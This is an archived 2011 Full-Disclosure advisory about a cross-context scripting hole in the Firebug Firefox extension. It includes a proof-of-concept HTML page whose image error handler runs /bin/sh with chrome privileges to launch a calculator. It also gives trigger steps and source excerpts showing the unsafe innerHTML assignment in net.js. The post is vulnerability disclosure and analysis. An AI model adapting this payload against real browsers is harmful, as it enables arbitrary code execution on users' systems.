lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Sun, 19 Jun 2011 05:35:53 -0700
From: IEhrepus <5up3rh3i@...il.com>
To: full-disclosure@...ts.grok.org.uk
Cc: mario.heiderich@...glemail.com
Subject: Firebug Firefox Extension Cross Context Scripting
	Vulnerability

http://www.80vul.com/firefox/Firebug%20Firefox%20Extension%20Cross%20Context%20Scripting%20Vulnerability.htm

 *Firebug Firefox Extension Cross Context Scripting Vulnerability*



Author: www.80vul.com [Email:5up3rh3i#gmail.com]

2011/06/18 - Public Disclosure



*Description*



80vul.com discovered firebug that a famous firefox extension is vulnerable
to Cross Context Scripting, and this vul can execute evil codz in the chrome
privileged Firefox zone.so successful exploitation allows execution of
arbitrary code in user’s system.





*Exploitation*



a demo : http://www.80vul.com/firefox/firebug0day.htm



<html>

<head>firebug 0day</head>

<body>

<img src=2 onerror='var file = Components.classes["@mozilla.org/file/local;1
"].createInstance(Components.interfaces.nsILocalFile);file.initWithPath
("/bin/sh");var process =Components.classes["@mozilla.org/process/util;1"].
createInstance(Components.interfaces.nsIProcess);process.init(file);var
args= ["-c", "
gcalctool"];process.run(false, args, args.length);'></img>

</body>

</html>



Open the firebug, and visite the exploit's URL, then open "NET"
-->URL-->"HTML" , and gcalctool is executed.







*Analysis*



extract the code from firebug@...tware.joehewitt.com.xpi by rar or zip .
then let’s go ...



80vul@...ntu:~$ grep -in 'body.innerHTML' -r ./
firebug@...tware.joehewitt.com/ --colour

./firebug@...tware.joehewitt.com/content/firebug/traceModule.js:1128:
iframe.contentWindow.document.body.innerHTML = text;

./firebug@...tware.joehewitt.com/content/firebug/net.js:2561:
iframe.contentWindow.document.body.innerHTML = text;



80vul@...ntu:~$ grep -in 'body.innerHTML' -r ./
firebug@...tware.joehewitt.com/content/firebug/net.js --colour -8

2553-        }

2554-

2555-        if (hasClass(tab, "netInfoHtmlTab") && file.loaded && !
netInfoBox.htmlPresented)

2556-        {

2557-            netInfoBox.htmlPresented = true;

2558-

2559-            var text = Utils.getResponseText(file, context);

2560-            var iframe = netInfoBox.getElementsByClassName("
netInfoHtmlPreview").item(0);

2561:            iframe.contentWindow.document.body.innerHTML = text;

2562-        }

2563-

2564-        // Notify listeners about update so, content of custom tabs can
be updated.

2565-        dispatch(NetInfoBody.fbListeners, "updateTabBody", [netInfoBox,
file, context]);

2566-    },

2567-

2568-    setResponseText: function(file, netInfoBox, responseTextBox,
context)

2569-    {



edit the content/firebug/net.js and seach "netInfoHtmlTab":



80vul@...ntu:~$ gedit ./
firebug@...tware.joehewitt.com/content/firebug/net.js



Firebug.NetMonitor.NetInfoBody = domplate(Firebug.Rep, new Firebug.Listener
(),

{

    tag:

        DIV({"class": "netInfoBody", _repObject: "$file"},

            TAG("$infoTabs", {file: "$file"}),

            TAG("$infoBodies", {file: "$file"})

        ),



    infoTabs:

        DIV({"class": "netInfoTabs focusRow subFocusRow", "role": "tablist
"},

            A({"class": "netInfoParamsTab netInfoTab a11yFocus", onclick: "$
onClickTab", "role": "tab",

                view: "Params",

                $collapsed: "$file|hideParams"},

                $STR("URLParameters")

            ),

            A({"class": "netInfoHeadersTab netInfoTab a11yFocus", onclick:
"$onClickTab", "role": "tab",

                view: "Headers"},

                $STR("Headers")

            ),

            A({"class": "netInfoPostTab netInfoTab a11yFocus", onclick: "$
onClickTab", "role": "tab",

                view: "Post",

                $collapsed: "$file|hidePost"},

                $STR("Post")

            ),

            A({"class": "netInfoPutTab netInfoTab a11yFocus", onclick: "$
onClickTab", "role": "tab",

                view: "Put",

                $collapsed: "$file|hidePut"},

                $STR("Put")

            ),

            A({"class": "netInfoResponseTab netInfoTab a11yFocus", onclick:
"$onClickTab", "role": "tab",

                view: "Response",

                $collapsed: "$file|hideResponse"},

                $STR("Response")

            ),

            A({"class": "netInfoCacheTab netInfoTab a11yFocus", onclick: "$
onClickTab", "role": "tab",

               view: "Cache",

               $collapsed: "$file|hideCache"},

               $STR("Cache")

            ),

            A({"class": "netInfoHtmlTab netInfoTab a11yFocus", onclick: "$
onClickTab", "role": "tab",

               view: "Html",

               $collapsed: "$file|hideHtml"},

               $STR("HTML")

            )

        ),






hitest

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ